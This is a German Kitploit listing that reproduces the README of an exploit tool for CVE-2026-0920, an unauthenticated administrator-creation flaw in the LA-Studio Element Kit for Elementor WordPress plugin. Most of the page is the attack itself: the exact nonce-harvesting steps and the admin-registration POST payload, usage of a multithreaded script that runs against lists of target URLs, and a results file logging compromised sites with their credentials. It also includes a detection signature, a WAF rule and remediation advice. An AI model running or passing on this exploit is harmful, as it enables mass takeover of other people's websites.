Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-0920- — - LA-Studio Element Kit for Elementor <= 1.5.6.3 - Nicht authentifizierte Rechteausweitung über eine Backdoor zur Erstellung von Administratorkonten über den Parameter lakit_bkrole | Kitploit
Tools/GitHubGitHub/nxploited/cve-2026-0920-
Privilege EscalationSchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitLernen & Bildung
GitHubnxploited/cve-2026-0920-

CVE-2026-0920-

- LA-Studio Element Kit for Elementor <= 1.5.6.3 - Nicht authentifizierte Rechteausweitung über eine Backdoor zur Erstellung von Administratorkonten über den Parameter lakit_bkrole

Repository anzeigen
21vor 4 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-0920-

LA-Studio Element Kit für Elementor <= 1.5.6.3 - Nicht authentifizierte Privilegienerweiterung per Backdoor zur Erstellung von Administratorkonten über den Parameter lakit_bkrole

root@kitploit:~
   _____   _____   ___ __ ___  __      __  ___ ___ __  
  / __\ \ / / __|_|_  )  \_  )/ / ___ /  \/ _ \_  )  \ 
 | (__ \ V /| _|___/ / () / // _ \___| () \_, // / () |
  \___| \_/ |___| /___\__/___\___/    \__/ /_//___\__/ 

Telegram CVE CVSS Python License


📡 Der Exploit erscheint hier zuerst. Folge @KNxploited auf Telegram — dein Elite-Feed für frisch veröffentlichte CVEs, funktionierende PoCs und präzise Sicherheitsforschung. Unermüdlich aktualisiert. Entwickelt für alle, die immer einen Schritt voraus sind.


🧠 Übersicht

CVE-2026-0920 ist eine kritische CVSS-9.8-Schwachstelle, die im LA-Studio Element Kit for Elementor WordPress-Plugin entdeckt wurde.

Die Schwachstelle liegt in der Funktion ajax_register_handle(), die nicht authentifizierte Benutzerregistrierungen über AJAX verarbeitet. Die Funktion erzwingt keinerlei Einschränkung des Parameters lakit_bkrole – wodurch ein vollständig nicht authentifizierter Angreifer sich bei der Registrierung selbst die Rolle administrator zuweisen kann und mit einer einzigen Anfrage die vollständige Übernahme der WordPress-Administration erreicht.


💀 Detaillierte Schwachstellenanalyse

Die Grundursache ist eine fehlende Rollen-Berechtigungsprüfung im AJAX-Registrierungshandler des Plugins:

root@kitploit:~
// Registered with no authentication requirement
add_action('wp_ajax_nopriv_lakit_ajax', [$this, 'ajax_register_handle']);

public function ajax_register_handle() {
    $actions = json_decode(stripslashes($_POST['actions']), true);

    foreach ($actions as $req) {
        if ($req['action'] === 'register') {
            $data = $req['data'];

            $user_data = [
                'user_login' => $data['username'],
                'user_pass'  => $data['password'],
                'user_email' => $data['email'],
                'role'       => $data['lakit_bkrole'], // ← ATTACKER CONTROLLED
            ];

            // No validation of $data['lakit_bkrole'] against allowed roles
            wp_insert_user($user_data); // Administrator created silently
        }
    }
}

Warum das kritisch ist:

  • wp_ajax_nopriv_* = für jeden ohne jegliche Authentifizierung zugänglich
  • lakit_bkrole akzeptiert jede WordPress-Rollenzeichenfolge – einschließlich administrator
  • Eine einzige POST-Anfrage erstellt ein vollständig privilegiertes Administratorkonto
  • Das erforderliche Nonce wird öffentlich im Frontend-HTML/JS der Website offengelegt
  • Kein Rate-Limiting, standardmäßig keine CAPTCHA-Erzwingung, keine E-Mail-Verifizierung erforderlich

⚔️ Exploit-Kette

root@kitploit:~
Step 1 — Nonce Harvesting
──────────────────────────────────────────────────────────────────────
GET / (or /index.php, /home, /?page_id=1)

Search HTML/JS for:
  "ajaxNonce": "<value>"         ← Inline JSON config
  ajaxNonce: '<value>'           ← JS variable
  data-ajaxnonce="<value>"       ← HTML attribute

Nonce is publicly accessible — no login required.
  ↓
ajaxNonce extracted ✔️

──────────────────────────────────────────────────────────────────────
Step 2 — Admin Account Registration
──────────────────────────────────────────────────────────────────────
POST /wp-admin/admin-ajax.php

  action  = lakit_ajax
  _nonce  = <extracted nonce>
  actions = {
    "req1": {
      "action": "register",
      "data": {
        "email":                  "[email protected]",
        "password":               "adminSA",
        "username":               "Nx_admin",
        "lakit_field_log":        "yes",   ← use supplied username
        "lakit_field_pwd":        "yes",   ← use supplied password
        "lakit_field_cpwd":       "no",    ← skip password confirm
        "lakit_bkrole":           "1",     ← trigger admin role injection
        "lakit_recaptcha_response": ""
      }
    }
  }
  ↓
Administrator account silently created ✔️

──────────────────────────────────────────────────────────────────────
Step 3 — Full Admin Verification
──────────────────────────────────────────────────────────────────────
POST /wp-login.php
  log = Nx_admin
  pwd = adminSA
  ↓
Session cookies obtained → GET /wp-admin/plugin-install.php
  ↓
Plugin install page accessible = CONFIRMED FULL ADMIN ✔️

⚙️ Voraussetzungen

root@kitploit:~
pip install requests colorama
AbhängigkeitZweck
requestsHTTP-Anfragen, Sitzungsverwaltung, Cookie-Verwaltung
colorama

Python 3.10+ wird empfohlen (verwendet str | None-Union-Typ-Hinweise).


📂 Dateistruktur

root@kitploit:~
CVE-2026-0920/
├── CVE-2026-0920.py          # Main exploit script
├── list.txt                  # Target URLs — one per line
├── success_results.txt       # Auto-generated: pwned targets + credentials

🚀 Verwendung

Schritt 1 — Anmeldedaten konfigurieren (Optional)

Öffne CVE-2026-0920.py und bearbeite die Konstanten am Anfang der Datei, um die gewünschten Admin-Kontodaten festzulegen:

root@kitploit:~
ADMIN_EMAIL    = "[email protected]"   # Email for the new admin account
ADMIN_PASSWORD = "adminSA"                 # Password for the new admin account
ADMIN_USERNAME = "Nx_admin"               # Username for the new admin account

Schritt 2 — Ziele vorbereiten

Erstelle list.txt mit einer Ziel-URL pro Zeile:

root@kitploit:~
https://target1.com
https://target2.com
http://target3.com

URLs ohne Schema werden automatisch mit https:// ergänzt.


Schritt 3 — Den Exploit ausführen

root@kitploit:~
python CVE-2026-0920.py

Du wirst aufgefordert:

root@kitploit:~
Enter targets list filename (e.g. list.txt): list.txt
Enter number of threads (1-50):             20

Schritt 4 — Live-Ausgabe überwachen

Das Skript erzeugt eine farbcodierte Echtzeitausgabe im Terminal:

root@kitploit:~
[14:22:01] [*] https://target.com - Starting target
[14:22:02] [+] https://target.com - kay: a4f9c2b1e3
[14:22:02] [*] https://target.com - AJAX HTTP status: 200
[14:22:03] [+] https://target.com - AJAX response indicates success
[14:22:04] [*] https://target.com - Full admin verification: OK

============================================================
[ SUCCESS BLOCK ]
Site        : https://target.com
Result      : SUCCESS
AJAX OK     : YES
FULL ADMIN  : YES (login + plugin install access)
============================================================
Farbe

Schritt 5 — Ergebnisse prüfen

Erfolgreiche Exploits werden in success_results.txt geschrieben:

root@kitploit:~
https://victim.com | USERNAME:Nx_admin | EMAIL:[email protected] | PASSWORD:adminSA | LOGIN:FULL_ADMIN_OK | RESP_SUCCESS:YES | NONCE:a4f9c2b1e3

Jede Zeile enthält das vollständige Bild: Ziel, Anmeldedaten, Anmeldestatus, AJAX-Antwortstatus und das verwendete Nonce.


🖥️ Referenz der Skriptparameter


🔬 Verifizierungslogik

Das Skript führt eine zweistufige Verifizierung durch, um Fehlalarme zu eliminieren:

root@kitploit:~
Stage 1 — AJAX Response Analysis
  Checks for success markers in the JSON response:
    • "created successfully"
    • "success":true
    • "type":"success"
    • "status":"success"

Stage 2 — Real Login + Plugin Install Access Test
  1. POST /wp-login.php with injected credentials
  2. GET /wp-admin/plugin-install.php
  3. Confirm 200 response + plugin upload form present
  4. Confirm no redirect back to wp-login.php

Only BOTH stages passing = TRUE SUCCESS reported

Dies eliminiert Fehlalarme, die durch Websites verursacht werden, die bei AJAX 200 OK zurückgeben, aber die Registrierung stillschweigend fehlschlagen lassen.


📊 Erkennungssignatur

Der Exploit erzeugt dieses spezifische Netzwerkmuster – für Verteidiger und WAF-Autoren:

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded

action=lakit_ajax&_nonce=<VALUE>&actions={"req1":{"action":"register","data":{...,"lakit_bkrole":"1",...}}}

WAF-/IDS-Regel (Pseudocode):

root@kitploit:~
IF  request.method == POST
AND request.path   == "/wp-admin/admin-ajax.php"
AND request.body   CONTAINS "lakit_ajax"
AND request.body   CONTAINS "lakit_bkrole"
THEN BLOCK + ALERT (Privilege Escalation Attempt — CVE-2026-0920)

🛡️ Gegenmaßnahmen & Behebung

Wenn du Website-Betreiber, Entwickler oder Verteidiger bist, handle sofort:

  • ✅ Aktualisiere LA-Studio Element Kit for Elementor auf eine Version über 1.5.6.3
  • ✅ Deaktiviere und lösche das Plugin, bis eine bestätigte, gepatchte Version installiert ist
  • ✅ Überprüfe alle WordPress-Administratorkonten – entferne alle nicht erkannten Einträge sofort
  • ✅ Erzwinge serverseitige Rollenvalidierung – vertraue niemals vom Benutzer übermittelten Rollenwerten ohne Whitelist-Prüfung
  • ✅ Blockiere nicht authentifizierte POST-Anfragen an admin-ajax.php, die lakit_bkrole enthalten, auf WAF-Ebene
  • ✅ Überwache Server- und WordPress-Aktivitätsprotokolle auf lakit_ajax-AJAX-Aktionsaufrufe
  • ✅ Aktiviere die Zwei-Faktor-Authentifizierung für alle vorhandenen Admin-Konten als Eindämmungsmaßnahme
  • ✅ Prüfe das Wordfence-Advisory und wende alle empfohlenen Härtungsmaßnahmen an

⚠️ Haftungsausschluss

root@kitploit:~
THIS TOOL IS PROVIDED STRICTLY FOR EDUCATIONAL, AUTHORIZED PENETRATION
TESTING, AND SECURITY RESEARCH PURPOSES ONLY.

By downloading, executing, or modifying this script, you explicitly agree:

  • You hold EXPLICIT, WRITTEN authorization from the owner of every
    target system you test. No exceptions. No grey areas.

  • You are operating within a formally scoped, authorized penetration
    testing engagement or a controlled lab environment.

  • You will NOT use this tool against any system, network, or
    infrastructure without documented legal permission.

  • Nxploited and all contributors bear ZERO liability for unauthorized
    use, data loss, system damage, legal proceedings, or criminal
    prosecution arising from the use of this tool.

Unauthorized use of this exploit constitutes a criminal offense under:
  — Computer Fraud and Abuse Act (CFAA), USA
  — Computer Misuse Act (CMA), UK
  — EU Directive 2013/40/EU on Attacks Against Information Systems
  — Saudi Arabia's Anti-Cyber Crime Law (No. M/17)
  — And all equivalent national and international cybercrime legislation.

USE RESPONSIBLY. HACK ETHICALLY. DISCLOSE RESPONSIBLY.

👤 Autor

HandleNxploited
Telegram@KNxploited
GitHubgithub.com/Nxploited

🔔 Folge @KNxploited auf Telegram Frische CVEs. Funktionierende Exploits. Tiefgehende Schwachstellenforschung. Zuerst informiert. Zuerst gehandelt. Nicht der Letzte sein.


Mit Präzision entwickelt von Nxploited · Nur für autorisierte Sicherheitsforschung · CVSS 9.8 Kritisch
Tool herunterladen
FeldDetails
CVE-IDCVE-2026-0920
PluginLA-Studio Element Kit for Elementor
Sluglakit / la-studio-element-kit-for-elementor
Betroffene VersionenAlle Versionen bis einschließlich 1.5.6.3
SchwachstellentypNicht authentifizierte Privilegienerweiterung / Admin-Erstellung
AngriffsvektorNetzwerk — keine Authentifizierung erforderlich
CVSS-3.1-Score9.8 KRITISCH
CVSS-VektorAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CNAWordfence
AuswirkungVollständige Übernahme der WordPress-Administration
ForscherNxploited
Farbige Terminalausgabe auf allen Plattformen
threadingParallele Verarbeitung mehrerer Ziele
reRegex-basierte Nonce-Extraktion aus HTML/JS
Bedeutung
🔵 Cyan [*]Information — Schritt in Bearbeitung
🟢 Grün [+]Positives Signal — teilweiser oder voller Erfolg
🟡 Gelb [!]Warnung — mehrdeutiges Ergebnis, Überprüfung erforderlich
🔴 Rot [-]Fehlgeschlagen — Ziel nicht ausnutzbar oder Fehler aufgetreten
ParameterStandardBeschreibung
Zieldateilist.txtDatei, die die Ziel-URLs enthält
Threads10 (max: 50)Parallele Worker
ADMIN_EMAIL[email protected]E-Mail für das injizierte Admin-Konto
ADMIN_PASSWORDadminSAPasswort für das injizierte Admin-Konto
ADMIN_USERNAMENx_adminBenutzername für das injizierte Admin-Konto